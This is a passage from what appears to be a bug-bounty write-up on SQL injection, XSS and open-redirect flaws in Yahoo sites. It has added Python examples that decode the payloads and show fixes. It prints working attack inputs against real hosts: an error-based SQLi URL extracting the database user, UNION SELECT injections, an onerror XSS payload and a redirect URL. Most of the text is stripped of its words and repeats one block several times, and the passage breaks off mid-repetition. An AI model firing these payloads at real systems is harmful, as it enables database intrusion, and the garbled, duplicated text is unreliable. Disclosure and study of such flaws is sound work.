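    return 302, done if is_safe_done(done) else DEFAULT_DONE


if __name__ == "__main__":
    # The parameters of the proof-of-concept request; the crumb is the one from the real form.
    attack = {"choice": "preview", "done": "http://example.com", "hid": "zzzzzzz", "ycb": "MALFORMED"}
    print("vulnerable GET :", merge_submit_vulnerable("GET", attack, "z5H1KI8rvxS"))
    print("fixed GET      :", merge_submit_fixed("GET", attack, "z5H1KI8rvxS"))
    print("fixed POST     :", merge_submit_fixed("POST", dict(attack, ycb="z5H1KI8rvxS"), "z5H1KI8rvxS"))
```

The host comparison uses the parsed hostname rather than a prefix match, so "http://m.yahoo.com.example.com" and "http://m.yahoo.com@example.com" both fail, and a bare "http:/example.com" fails because it has a scheme but no host.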

SQLi on hk.promotion.yahoo.net

[Paragraph lost in extraction; it concerned the yahoo.net domain.]

An error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
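Decoding that request, as an added example in Python (not from the original post): it pulls the injected SQL out of comment_url, decodes the two hex literals that bracket user(), and shows how the leaked value is read back out of MySQL's duplicate-entry error. The server-side query template and the sample error text are constructed assumptions; the request URL is the one from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The request from the report above, verbatim.
PAYLOAD_URL = (
    "http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments"
    "&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/"
    "%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,"
    "user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA."
    "CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK"
    "&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928"
)


def injected_sql(url: str) -> str:
    """Return the part of comment_url after the real path: the quote that closes the
    server's string literal plus everything appended to it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    value = params["comment_url"][0]  # parse_qs already percent-decodes
    return value[value.index("'"):]


# Assumed shape of the server-side query; the page only shows that comment_url
# lands inside a single-quoted string.
QUERY_TEMPLATE = "SELECT author, body FROM comments WHERE comment_url = '{value}' LIMIT 3"


def rendered_query(url: str) -> str:
    """Where the payload lands: ' AND (...) AND 'cQlK'='cQlK keeps the quotes balanced."""
    value = parse_qs(urlsplit(url).query)["comment_url"][0]
    return QUERY_TEMPLATE.format(value=value)


HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def decode_hex_literals(sql: str) -> dict:
    """MySQL reads 0x3a766f763a as a string; payload generators use that to avoid quotes."""
    return {m.group(0): bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(sql)}


def leaked_value(error_text: str, start=":vov:", end=":vay:"):
    """COUNT(*) ... GROUP BY CONCAT(marker, user(), marker, FLOOR(RAND(0)*2)) makes MySQL
    insert the same key twice into its GROUP BY temporary table, and the resulting
    'Duplicate entry' error quotes that key, user() included. Cut it out between the markers."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), error_text)
    return m.group(1) if m else None


# Constructed example of the error text the endpoint would echo back.
SAMPLE_ERROR = "Duplicate entry ':vov:promo_rw@localhost:vay:1' for key 'group_key'"

if __name__ == "__main__":
    sql = injected_sql(PAYLOAD_URL)
    print(rendered_query(PAYLOAD_URL))
    print(decode_hex_literals(sql))
    print(leaked_value(SAMPLE_ERROR))
```

INFORMATION_SCHEMA.CHARACTER_SETS plays no role beyond being a table every MySQL user can read that has enough rows for RAND(0) to repeat a value; the markers :vov: and :vay: are only there so the value can be cut out of the error text reliably.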

The fourth and last one. XSS on info.yahoo.com

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info&region=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

Reported as:
XSS at info.yahoo.com
[The reply is lost in extraction; it mentions http versus https.] The og:title and og:description meta tags of the popup are affected. The og:title tag as rendered:
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
[Rest of the note lost in extraction; it concerns the XSS and Chrome.]
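The rendering bug behind that meta tag, as an added example (not the page's code): the og:title value goes into a double-quoted HTML attribute, so any " in it closes the attribute early and what follows is parsed as markup. The block contrasts the unescaped rendering with html.escape(quote=True) and runs both through Python's HTMLParser to list the elements each produces. The break-out string and the title constant are constructed; the page's own payload is included only so it can be fed through the same parser.

```python
import html
from html.parser import HTMLParser

ARTICLE_TITLE = ("Yahoo Enters into Amendment to Share Repurchase and Preference Sale "
                 "Agreement with Alibaba")


def meta_unescaped(title: str) -> str:
    """What the report shows: the title is dropped straight into the attribute value."""
    return f'<meta property="og:title" content="{title}"/>'


def meta_escaped(title: str) -> str:
    """Attribute context: ampersand, angle brackets and both quote characters must be
    encoded before the value goes into content=...; html.escape(quote=True) does all five."""
    return f'<meta property="og:title" content="{html.escape(title, quote=True)}"/>'


class TagCollector(HTMLParser):
    """Records the element names a browser-like parser creates from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(markup: str) -> list:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


# Constructed break-out: the leading " closes content="...", so the <img> becomes an element.
BREAKOUT = '"><img src=asdf onerror=alert(1)>' + ARTICLE_TITLE
# The string exactly as it appears in the meta tag quoted above.
PAGE_PAYLOAD = r"""og <img src=asdf onerror='alert(\"xss\")'> """ + ARTICLE_TITLE

if __name__ == "__main__":
    for label, payload in (("page payload", PAGE_PAYLOAD), ("break-out", BREAKOUT)):
        print(label, "unescaped ->", elements_in(meta_unescaped(payload)))
        print(label, "escaped   ->", elements_in(meta_escaped(payload)))
```

Running it prints what each string turns into; note that a backslash is not an escape character in HTML, so where a payload's " lands decides whether the attribute closes early, which is exactly what an attribute-context check must look at.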


finance.yahoo.com: a UNION SELECT SQLi [details lost in extraction]. How it went:
21.11 - [text lost]
25.11 - [text lost]
27.11 - quoted reply [text lost]
27.11 - [text lost]
2.12 - quoted reply [text lost]
"WTF?!!!"
10.12 - quoted reply [text lost]
Yahoo's position on XSS and SQLi, quoted verbatim:
SQLi and XSS are off.

[Sentence lost in extraction; it mentions a top-10 and Yahoo's Wall of Fame.]

My HackerOne profile: hackerone.com/4lemon

PS. [Text lost in extraction; it mentions HackerOne and Yahoo.]

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
